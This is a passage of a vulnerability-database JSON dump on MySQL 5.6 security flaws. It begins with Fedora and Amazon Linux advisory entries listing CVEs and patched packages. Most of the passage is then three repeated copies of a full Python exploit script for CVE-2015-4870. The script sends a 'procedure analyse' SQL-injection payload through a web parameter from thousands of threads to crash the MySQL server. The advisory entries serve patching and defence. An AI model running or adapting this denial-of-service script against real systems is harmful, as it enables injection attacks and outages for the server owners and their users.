", "modified": "2016-03-09T20:17:15", "published": "2016-03-09T20:17:15", "id": "FEDORA:B323460B0848", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: community-mysql-5.6.29-1.fc22", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4766", "CVE-2015-4791", "CVE-2015-4792", "CVE-2015-4800", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4833", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4864", "CVE-2015-4866", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4890", "CVE-2015-4895", "CVE-2015-4904", "CVE-2015-4905", "CVE-2015-4910", "CVE-2015-4913", "CVE-2015-7744", "CVE-2016-0502", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0594", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0599", "CVE-2016-0600", "CVE-2016-0601", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0616"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. 
", "modified": "2016-03-09T20:22:00", "published": "2016-03-09T20:22:00", "id": "FEDORA:9EA6660762B4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: community-mysql-5.6.29-1.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:37:08", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2016-0611", "CVE-2016-0599", "CVE-2015-4913", "CVE-2016-0594", "CVE-2015-4864", "CVE-2016-0546", "CVE-2015-4910", "CVE-2016-0605", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-0616", "CVE-2015-4800", "CVE-2016-0610", "CVE-2016-0609", "CVE-2015-4791", "CVE-2015-4879", "CVE-2016-0596", "CVE-2016-0504", "CVE-2015-4792", "CVE-2015-4904", "CVE-2015-4833", "CVE-2016-0595", "CVE-2015-4819", "CVE-2016-0503", "CVE-2015-4807", "CVE-2016-0598", "CVE-2016-0502", "CVE-2016-0601", "CVE-2015-4766", "CVE-2015-4836", "CVE-2015-4861", "CVE-2016-0607", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-7744", "CVE-2015-4890", "CVE-2016-0505"], "description": "**Issue Overview:**\n\nwolfSSL (formerly CyaSSL) before 3.6.8 does not properly handle faults associated with the Chinese Remainder Theorem (CRT) process when allowing ephemeral key exchange without low memory optimizations on a server, which makes it easier for remote attackers to obtain private RSA keys by capturing TLS handshakes, also known as a Lenstra attack. ([CVE-2015-7744 __](<https://access.redhat.com/security/cve/CVE-2015-7744>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges. 
([CVE-2015-4864 __](<https://access.redhat.com/security/cve/CVE-2015-4864>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. ([CVE-2015-4866 __](<https://access.redhat.com/security/cve/CVE-2015-4866>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. ([CVE-2015-4861 __](<https://access.redhat.com/security/cve/CVE-2015-4861>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2015-4862 __](<https://access.redhat.com/security/cve/CVE-2015-4862>))\n\nUnspecified vulnerability in Oracle MySQL 5.5.46 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0616 __](<https://access.redhat.com/security/cve/CVE-2016-0616>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Memcached. ([CVE-2015-4910 __](<https://access.redhat.com/security/cve/CVE-2015-4910>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML, a different vulnerability than [CVE-2015-4858 __](<https://access.redhat.com/security/cve/CVE-2015-4858>). ([CVE-2015-4913 __](<https://access.redhat.com/security/cve/CVE-2015-4913>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. 
([CVE-2016-0610 __](<https://access.redhat.com/security/cve/CVE-2016-0610>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.21 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2016-0594 __](<https://access.redhat.com/security/cve/CVE-2016-0594>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2016-0595 __](<https://access.redhat.com/security/cve/CVE-2016-0595>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2016-0596 __](<https://access.redhat.com/security/cve/CVE-2016-0596>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0597 __](<https://access.redhat.com/security/cve/CVE-2016-0597>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2016-0598 __](<https://access.redhat.com/security/cve/CVE-2016-0598>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than [CVE-2015-4802 __](<https://access.redhat.com/security/cve/CVE-2015-4802>). ([CVE-2015-4792 __](<https://access.redhat.com/security/cve/CVE-2015-4792>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Privileges. 
([CVE-2015-4791 __](<https://access.redhat.com/security/cve/CVE-2015-4791>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier, when running on Windows, allows remote authenticated users to affect availability via unknown vectors related to Server : Query Cache. ([CVE-2015-4807 __](<https://access.redhat.com/security/cve/CVE-2015-4807>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser. ([CVE-2015-4870 __](<https://access.redhat.com/security/cve/CVE-2015-4870>))\n\nUnspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0599 __](<https://access.redhat.com/security/cve/CVE-2016-0599>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client. ([CVE-2016-0546 __](<https://access.redhat.com/security/cve/CVE-2016-0546>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than [CVE-2015-4913 __](<https://access.redhat.com/security/cve/CVE-2015-4913>). ([CVE-2015-4858 __](<https://access.redhat.com/security/cve/CVE-2015-4858>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DDL. ([CVE-2015-4815 __](<https://access.redhat.com/security/cve/CVE-2015-4815>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition. 
([CVE-2015-4833 __](<https://access.redhat.com/security/cve/CVE-2015-4833>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges. ([CVE-2015-4830 __](<https://access.redhat.com/security/cve/CVE-2015-4830>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : SP. ([CVE-2015-4836 __](<https://access.redhat.com/security/cve/CVE-2015-4836>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to UDF. ([CVE-2016-0608 __](<https://access.redhat.com/security/cve/CVE-2016-0608>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to privileges. ([CVE-2016-0609 __](<https://access.redhat.com/security/cve/CVE-2016-0609>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to Options. ([CVE-2016-0505 __](<https://access.redhat.com/security/cve/CVE-2016-0505>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than [CVE-2016-0503 __](<https://access.redhat.com/security/cve/CVE-2016-0503>). ([CVE-2016-0504 __](<https://access.redhat.com/security/cve/CVE-2016-0504>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Replication. 
([CVE-2015-4890 __](<https://access.redhat.com/security/cve/CVE-2015-4890>))\n\nUnspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Partition. ([CVE-2016-0601 __](<https://access.redhat.com/security/cve/CVE-2016-0601>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to libmysqld. ([CVE-2015-4904 __](<https://access.redhat.com/security/cve/CVE-2015-4904>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML. ([CVE-2015-4905 __](<https://access.redhat.com/security/cve/CVE-2015-4905>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors. ([CVE-2016-0605 __](<https://access.redhat.com/security/cve/CVE-2016-0605>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect integrity via unknown vectors related to encryption. ([CVE-2016-0606 __](<https://access.redhat.com/security/cve/CVE-2016-0606>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows local users to affect availability via unknown vectors related to Server : Security : Firewall. ([CVE-2015-4766 __](<https://access.redhat.com/security/cve/CVE-2015-4766>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0611 __](<https://access.redhat.com/security/cve/CVE-2016-0611>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to replication. 
([CVE-2016-0607 __](<https://access.redhat.com/security/cve/CVE-2016-0607>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client programs. ([CVE-2015-4819 __](<https://access.redhat.com/security/cve/CVE-2015-4819>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to DML. ([CVE-2015-4879 __](<https://access.redhat.com/security/cve/CVE-2015-4879>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. ([CVE-2016-0502 __](<https://access.redhat.com/security/cve/CVE-2016-0502>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. ([CVE-2015-4895 __](<https://access.redhat.com/security/cve/CVE-2015-4895>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than [CVE-2016-0504 __](<https://access.redhat.com/security/cve/CVE-2016-0504>). ([CVE-2016-0503 __](<https://access.redhat.com/security/cve/CVE-2016-0503>))\n\nUnspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. ([CVE-2016-0600 __](<https://access.redhat.com/security/cve/CVE-2016-0600>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than [CVE-2015-4792 __](<https://access.redhat.com/security/cve/CVE-2015-4792>). 
([CVE-2015-4802 __](<https://access.redhat.com/security/cve/CVE-2015-4802>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer. ([CVE-2015-4800 __](<https://access.redhat.com/security/cve/CVE-2015-4800>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Types. ([CVE-2015-4826 __](<https://access.redhat.com/security/cve/CVE-2015-4826>)) \n\n\n \n**Affected Packages:** \n\n\nmysql56\n\n \n**Issue Correction:** \nRun _yum update mysql56_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n mysql56-debuginfo-5.6.29-1.14.amzn1.i686 \n mysql56-common-5.6.29-1.14.amzn1.i686 \n mysql56-test-5.6.29-1.14.amzn1.i686 \n mysql56-errmsg-5.6.29-1.14.amzn1.i686 \n mysql56-server-5.6.29-1.14.amzn1.i686 \n mysql56-devel-5.6.29-1.14.amzn1.i686 \n mysql56-5.6.29-1.14.amzn1.i686 \n mysql56-libs-5.6.29-1.14.amzn1.i686 \n mysql56-bench-5.6.29-1.14.amzn1.i686 \n mysql56-embedded-devel-5.6.29-1.14.amzn1.i686 \n mysql56-embedded-5.6.29-1.14.amzn1.i686 \n \n src: \n mysql56-5.6.29-1.14.amzn1.src \n \n x86_64: \n mysql56-test-5.6.29-1.14.amzn1.x86_64 \n mysql56-bench-5.6.29-1.14.amzn1.x86_64 \n mysql56-server-5.6.29-1.14.amzn1.x86_64 \n mysql56-5.6.29-1.14.amzn1.x86_64 \n mysql56-devel-5.6.29-1.14.amzn1.x86_64 \n mysql56-errmsg-5.6.29-1.14.amzn1.x86_64 \n mysql56-embedded-5.6.29-1.14.amzn1.x86_64 \n mysql56-debuginfo-5.6.29-1.14.amzn1.x86_64 \n mysql56-libs-5.6.29-1.14.amzn1.x86_64 \n mysql56-common-5.6.29-1.14.amzn1.x86_64 \n mysql56-embedded-devel-5.6.29-1.14.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-04-06T14:40:00", "published": "2016-04-06T14:40:00", "id": "ALAS-2016-684", "href": "https://alas.aws.amazon.com/ALAS-2016-684.html", "title": "Important: mysql56", "type": "amazon", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nMySQL 5.5.45 - procedure analyse Function Denial of Service", "edition": 1, "published": "2016-05-30T00:00:00", "title": "MySQL 5.5.45 - procedure analyse Function Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4870"], "modified": "2016-05-30T00:00:00", "id": "EXPLOITPACK:4856CE5DA621AD64273C51D5420971CA", "href": "", "sourceData": "#!/usr/bin/env python\n\n# Title: MySQL Procedure Analyse DoS Exploit\n# Author: Osanda Malith Jayathissa (@OsandaMalith)\n# E-Mail: osanda[cat]unseen.is\n# Version: Vulnerable upto MySQL 5.5.45\n# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/\n# This exploit is compatible with both Python 3.x and 2.x\n# CVE: CVE-2015-4870\n\nfrom __future__ import print_function\nimport threading\nimport time\nimport sys\nimport os\n\ntry: \n\timport urllib.request as urllib2\n\timport urllib.parse as urllib\n\nexcept ImportError:\n\timport urllib2\n\timport urllib\n\ntry: input = raw_input\nexcept NameError: pass\n\nhost = \"http://host/xxx.php?id=1'\"\n\npayload = \" procedure analyse((select*from(select 1)x),1)-- -\"\n\npayload = urllib.quote(payload)\nurl = host + payload\nreq = urllib2.Request(url)\nreq.add_header('Accept', '*/*')\nreq.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')\n#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')\nreq.add_header('Connection', '')\nreq.add_header('Content-type', 'text/xml')\ncls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')\n\nclass DoS(threading.Thread):\n\tdef run(self):\n\t\tprint(\"{0} started!\".format(self.getName()))\n\t\tfor i in range(100): \n\t\t\turllib2.urlopen(req)\n\n\t\ttime.sleep(.2) \n\t\tprint(\"{0} finished!\".format(self.getName())) \n\ndef banner():\n\tprint (''' 
\n ____ _____ __ \n /'\\\\_/`\\\\ /\\\\ _`\\\\ /\\\\ __`\\\\/\\\\ \\\\ \n/\\\\ \\\\ __ __\\\\ \\\\,\\\\L\\\\_\\\\ \\\\ \\\\/\\\\ \\\\ \\\\ \\\\ \n\\\\ \\\\ \\\\__\\\\ \\\\/\\\\ \\\\/\\\\ \\\\\\\\/_\\\\__ \\\\\\\\ \\\\ \\\\ \\\\ \\\\ \\\\ \\\\ __ \n \\\\ \\\\ \\\\_/\\\\ \\\\ \\\\ \\\\_\\\\ \\\\ /\\\\ \\\\L\\\\ \\\\ \\\\ \\\\\\\\'\\\\\\\\ \\\\ \\\\L\\\\ \\\\\n \\\\ \\\\_\\\\\\\\ \\\\_\\\\/`____ \\\\\\\\ `\\\\____\\\\ \\\\___\\\\_\\\\ \\\\____/\n \\\\/_/ \\\\/_/`/___/> \\\\\\\\/_____/\\\\/__//_/\\\\/___/ \n /\\\\___/ \n \\\\/__/ \n\t\t ____ ____ \n\t\t/\\\\ _`\\\\ /\\\\ _`\\\\ \n\t\t\\\\ \\\\ \\\\/\\\\ \\\\ ___\\\\ \\\\,\\\\L\\\\_\\\\ \n\t\t \\\\ \\\\ \\\\ \\\\ \\\\ / __`\\\\/_\\\\__ \\\\ \n\t\t \\\\ \\\\ \\\\_\\\\ \\\\/\\\\ \\\\L\\\\ \\\\/\\\\ \\\\L\\\\ \\\\ \n\t\t \\\\ \\\\____/\\\\ \\\\____/\\\\ `\\\\____\\\\\n\t\t \\\\/___/ \\\\/___/ \\\\/_____/\n \n[*] Author: Osanda Malith Jayathissa (@OsandaMalith)\n[*] E-Mail: osanda[cat]unseen.is\n[*] Website: http://osandamalith.wordpress.com \n[!] Author takes no responsibility of any damage you cause\n[!] Strictly for Educational purposes only \n''')\n\tprint(\"[*] Host: {0}\".format(host))\n\tinput(\"\\n\\t[-] Press Return to launch the attack\\n\")\n\ndef _start():\n\ttry:\n\t\tcls()\n\t\tbanner()\n\t\tfor i in range(10000): \n\t\t\tthread = DoS(name = \"[+] Thread-{0}\".format(i + 1)) \n\t\t\tthread.start() \n\t\t\ttime.sleep(.1)\n\n\texcept KeyboardInterrupt:\n\t\tprint ('\\n[!] Ctrl + C detected\\n[!] Exiting')\n\t\tsys.exit(0)\n\t\t\n\texcept EOFError:\n\t\tprint ('\\n[!] Ctrl + D detected\\n[!] 
Exiting')\n\t\tsys.exit(0)\n\nif __name__ == '__main__':\n\t_start()", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-03-13T20:35:27", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-05-30T00:00:00", "title": "MySQL 5.5.45 - procedure analyse Function Denial of Service", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4870"], "modified": "2016-05-30T00:00:00", "href": "https://0day.today/exploit/description/26031", "id": "1337DAY-ID-26031", "sourceData": "#!/usr/bin/env python\r\n \r\n# Title: MySQL Procedure Analyse DoS Exploit\r\n# Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n# E-Mail: osanda[cat]unseen.is\r\n# Version: Vulnerable upto MySQL 5.5.45\r\n# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/\r\n# This exploit is compatible with both Python 3.x and 2.x\r\n# CVE: CVE-2015-4870\r\n \r\nfrom __future__ import print_function\r\nimport threading\r\nimport time\r\nimport sys\r\nimport os\r\n \r\ntry: \r\n import urllib.request as urllib2\r\n import urllib.parse as urllib\r\n \r\nexcept ImportError:\r\n import urllib2\r\n import urllib\r\n \r\ntry: input = raw_input\r\nexcept NameError: pass\r\n \r\nhost = \"http://host/xxx.php?id=1'\"\r\n \r\npayload = \" procedure analyse((select*from(select 1)x),1)-- -\"\r\n \r\npayload = urllib.quote(payload)\r\nurl = host + payload\r\nreq = urllib2.Request(url)\r\nreq.add_header('Accept', '*/*')\r\nreq.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')\r\n#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')\r\nreq.add_header('Connection', '')\r\nreq.add_header('Content-type', 'text/xml')\r\ncls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')\r\n \r\nclass DoS(threading.Thread):\r\n def run(self):\r\n print(\"{0} 
started!\".format(self.getName()))\r\n for i in range(100): \r\n urllib2.urlopen(req)\r\n \r\n time.sleep(.2) \r\n print(\"{0} finished!\".format(self.getName())) \r\n \r\ndef banner():\r\n print (''' \r\n ____ _____ __ \r\n /'\\\\_/`\\\\ /\\\\ _`\\\\ /\\\\ __`\\\\/\\\\ \\\\ \r\n/\\\\ \\\\ __ __\\\\ \\\\,\\\\L\\\\_\\\\ \\\\ \\\\/\\\\ \\\\ \\\\ \\\\ \r\n\\\\ \\\\ \\\\__\\\\ \\\\/\\\\ \\\\/\\\\ \\\\\\\\/_\\\\__ \\\\\\\\ \\\\ \\\\ \\\\ \\\\ \\\\ \\\\ __ \r\n \\\\ \\\\ \\\\_/\\\\ \\\\ \\\\ \\\\_\\\\ \\\\ /\\\\ \\\\L\\\\ \\\\ \\\\ \\\\\\\\'\\\\\\\\ \\\\ \\\\L\\\\ \\\\\r\n \\\\ \\\\_\\\\\\\\ \\\\_\\\\/`____ \\\\\\\\ `\\\\____\\\\ \\\\___\\\\_\\\\ \\\\____/\r\n \\\\/_/ \\\\/_/`/___/> \\\\\\\\/_____/\\\\/__//_/\\\\/___/ \r\n /\\\\___/ \r\n \\\\/__/ \r\n ____ ____ \r\n /\\\\ _`\\\\ /\\\\ _`\\\\ \r\n \\\\ \\\\ \\\\/\\\\ \\\\ ___\\\\ \\\\,\\\\L\\\\_\\\\ \r\n \\\\ \\\\ \\\\ \\\\ \\\\ / __`\\\\/_\\\\__ \\\\ \r\n \\\\ \\\\ \\\\_\\\\ \\\\/\\\\ \\\\L\\\\ \\\\/\\\\ \\\\L\\\\ \\\\ \r\n \\\\ \\\\____/\\\\ \\\\____/\\\\ `\\\\____\\\\\r\n \\\\/___/ \\\\/___/ \\\\/_____/\r\n \r\n[*] Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n[*] E-Mail: osanda[cat]unseen.is\r\n[*] Website: http://osandamalith.wordpress.com \r\n[!] Author takes no responsibility of any damage you cause\r\n[!] Strictly for Educational purposes only \r\n''')\r\n print(\"[*] Host: {0}\".format(host))\r\n input(\"\\n\\t[-] Press Return to launch the attack\\n\")\r\n \r\ndef _start():\r\n try:\r\n cls()\r\n banner()\r\n for i in range(10000): \r\n thread = DoS(name = \"[+] Thread-{0}\".format(i + 1)) \r\n thread.start() \r\n time.sleep(.1)\r\n \r\n except KeyboardInterrupt:\r\n print ('\\n[!] Ctrl + C detected\\n[!] Exiting')\r\n sys.exit(0)\r\n \r\n except EOFError:\r\n print ('\\n[!] Ctrl + D detected\\n[!] 
Exiting')\r\n sys.exit(0)\r\n \r\nif __name__ == '__main__':\r\n _start()\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/26031"}], "exploitdb": [{"lastseen": "2016-05-30T21:10:56", "description": "MySQL 5.5.45 - procedure analyse Function Denial of Service. CVE-2015-4870. Dos exploits for multiple platform", "published": "2016-05-30T00:00:00", "type": "exploitdb", "title": "MySQL 5.5.45 - procedure analyse Function Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4870"], "modified": "2016-05-30T00:00:00", "id": "EDB-ID:39867", "href": "https://www.exploit-db.com/exploits/39867/", "sourceData": "#!/usr/bin/env python\r\n\r\n# Title: MySQL Procedure Analyse DoS Exploit\r\n# Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n# E-Mail: osanda[cat]unseen.is\r\n# Version: Vulnerable upto MySQL 5.5.45\r\n# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/\r\n# This exploit is compatible with both Python 3.x and 2.x\r\n# CVE: CVE-2015-4870\r\n\r\nfrom __future__ import print_function\r\nimport threading\r\nimport time\r\nimport sys\r\nimport os\r\n\r\ntry: \r\n\timport urllib.request as urllib2\r\n\timport urllib.parse as urllib\r\n\r\nexcept ImportError:\r\n\timport urllib2\r\n\timport urllib\r\n\r\ntry: input = raw_input\r\nexcept NameError: pass\r\n\r\nhost = \"http://host/xxx.php?id=1'\"\r\n\r\npayload = \" procedure analyse((select*from(select 1)x),1)-- -\"\r\n\r\npayload = urllib.quote(payload)\r\nurl = host + payload\r\nreq = urllib2.Request(url)\r\nreq.add_header('Accept', '*/*')\r\nreq.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')\r\n#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')\r\nreq.add_header('Connection', '')\r\nreq.add_header('Content-type', 
'text/xml')\r\ncls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')\r\n\r\nclass DoS(threading.Thread):\r\n\tdef run(self):\r\n\t\tprint(\"{0} started!\".format(self.getName()))\r\n\t\tfor i in range(100): \r\n\t\t\turllib2.urlopen(req)\r\n\r\n\t\ttime.sleep(.2) \r\n\t\tprint(\"{0} finished!\".format(self.getName())) \r\n\r\ndef banner():\r\n\tprint (''' \r\n ____ _____ __ \r\n /'\\\\_/`\\\\ /\\\\ _`\\\\ /\\\\ __`\\\\/\\\\ \\\\ \r\n/\\\\ \\\\ __ __\\\\ \\\\,\\\\L\\\\_\\\\ \\\\ \\\\/\\\\ \\\\ \\\\ \\\\ \r\n\\\\ \\\\ \\\\__\\\\ \\\\/\\\\ \\\\/\\\\ \\\\\\\\/_\\\\__ \\\\\\\\ \\\\ \\\\ \\\\ \\\\ \\\\ \\\\ __ \r\n \\\\ \\\\ \\\\_/\\\\ \\\\ \\\\ \\\\_\\\\ \\\\ /\\\\ \\\\L\\\\ \\\\ \\\\ \\\\\\\\'\\\\\\\\ \\\\ \\\\L\\\\ \\\\\r\n \\\\ \\\\_\\\\\\\\ \\\\_\\\\/`____ \\\\\\\\ `\\\\____\\\\ \\\\___\\\\_\\\\ \\\\____/\r\n \\\\/_/ \\\\/_/`/___/> \\\\\\\\/_____/\\\\/__//_/\\\\/___/ \r\n /\\\\___/ \r\n \\\\/__/ \r\n\t\t ____ ____ \r\n\t\t/\\\\ _`\\\\ /\\\\ _`\\\\ \r\n\t\t\\\\ \\\\ \\\\/\\\\ \\\\ ___\\\\ \\\\,\\\\L\\\\_\\\\ \r\n\t\t \\\\ \\\\ \\\\ \\\\ \\\\ / __`\\\\/_\\\\__ \\\\ \r\n\t\t \\\\ \\\\ \\\\_\\\\ \\\\/\\\\ \\\\L\\\\ \\\\/\\\\ \\\\L\\\\ \\\\ \r\n\t\t \\\\ \\\\____/\\\\ \\\\____/\\\\ `\\\\____\\\\\r\n\t\t \\\\/___/ \\\\/___/ \\\\/_____/\r\n \r\n[*] Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n[*] E-Mail: osanda[cat]unseen.is\r\n[*] Website: http://osandamalith.wordpress.com \r\n[!] Author takes no responsibility of any damage you cause\r\n[!] Strictly for Educational purposes only \r\n''')\r\n\tprint(\"[*] Host: {0}\".format(host))\r\n\tinput(\"\\n\\t[-] Press Return to launch the attack\\n\")\r\n\r\ndef _start():\r\n\ttry:\r\n\t\tcls()\r\n\t\tbanner()\r\n\t\tfor i in range(10000): \r\n\t\t\tthread = DoS(name = \"[+] Thread-{0}\".format(i + 1)) \r\n\t\t\tthread.start() \r\n\t\t\ttime.sleep(.1)\r\n\r\n\texcept KeyboardInterrupt:\r\n\t\tprint ('\\n[!] Ctrl + C detected\\n[!] 
